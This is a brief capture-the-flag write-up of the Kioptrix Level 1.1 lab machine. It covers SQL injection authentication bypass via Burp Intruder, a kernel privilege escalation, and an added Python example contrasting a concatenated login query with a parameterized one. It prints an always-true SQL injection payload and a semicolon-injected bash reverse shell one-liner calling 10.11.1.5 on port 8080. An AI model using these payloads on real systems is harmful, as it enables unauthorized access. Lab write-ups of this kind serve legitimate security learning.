Name: Kioptrix: Level 1.1
Date released: 17 Feb 2010
Initial scan results below
Found a login page running on port 80/Apache
Tried a bunch of normal username combos such as admin:admin, admin:password, etc.
Tried a couple of SQLi attempts in the username and password fields but couldn’t get an error message.
Decided to use Burp’s Intruder. Tested the uname field against a list of known SQL injection commands.
Inspected the shorter-length responses and found that a couple of the SQL injection payloads bypassed authentication.
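Why a login form fails this way, and the fix, as an added example that is not part of the original write-up and is not the target's code. It assumes the login handler builds its query by string concatenation; the table, function names, sample account and test input are constructed, and SQLite stands in for the real database.

```python
import sqlite3

def make_db():
    # Constructed sample data: one account in an in-memory SQLite database.
    # Password hashing is left out to keep the focus on query construction.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES ('admin', 'S3cret-not-guessable')")
    return db

def login_vulnerable(db, uname, psw):
    # Hypothetical handler: input is pasted into the SQL text, so a quote
    # character in either field changes the structure of the statement.
    query = ("SELECT username FROM users "
             "WHERE username = '%s' AND password = '%s'" % (uname, psw))
    try:
        return db.execute(query).fetchone() is not None
    except sqlite3.Error:
        # Errors are swallowed, so a malformed query just looks like a failed
        # login (consistent with seeing no error message in the page).
        return False

def login_parameterized(db, uname, psw):
    # Hardened form: placeholders keep the input as data; the database never
    # parses it as SQL, whatever characters it contains.
    query = "SELECT username FROM users WHERE username = ? AND password = ?"
    return db.execute(query, (uname, psw)).fetchone() is not None

# Constructed test input: closes the string literal, adds an always-true
# condition and comments out the password check.
CONSTRUCTED_INPUT = "' OR '1'='1' -- "

def compare():
    db = make_db()
    return {
        "vulnerable, wrong password": login_vulnerable(db, "admin", "wrong"),
        "vulnerable, constructed input": login_vulnerable(db, CONSTRUCTED_INPUT, "wrong"),
        "parameterized, constructed input": login_parameterized(db, CONSTRUCTED_INPUT, "wrong"),
        "parameterized, valid login": login_parameterized(db, "admin", "S3cret-not-guessable"),
    }

if __name__ == "__main__":
    for case, ok in compare().items():
        print(f"{case}: {'logged in' if ok else 'rejected'}")
```

The concatenated query accepts the constructed input with a wrong password, while the parameterized query rejects it and still accepts the valid credentials.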
After doing some initial testing, a bash reverse shell looked promising:
;bash -i >& /dev/tcp/10.11.1.5/8080 0>&1
low priv shell
Found and executed a Linux Kernel 2.4/2.6 Ring0 Privilege escalation exploit found here
Root!! This was fun and slightly harder than Level 1. On to Level 1.2!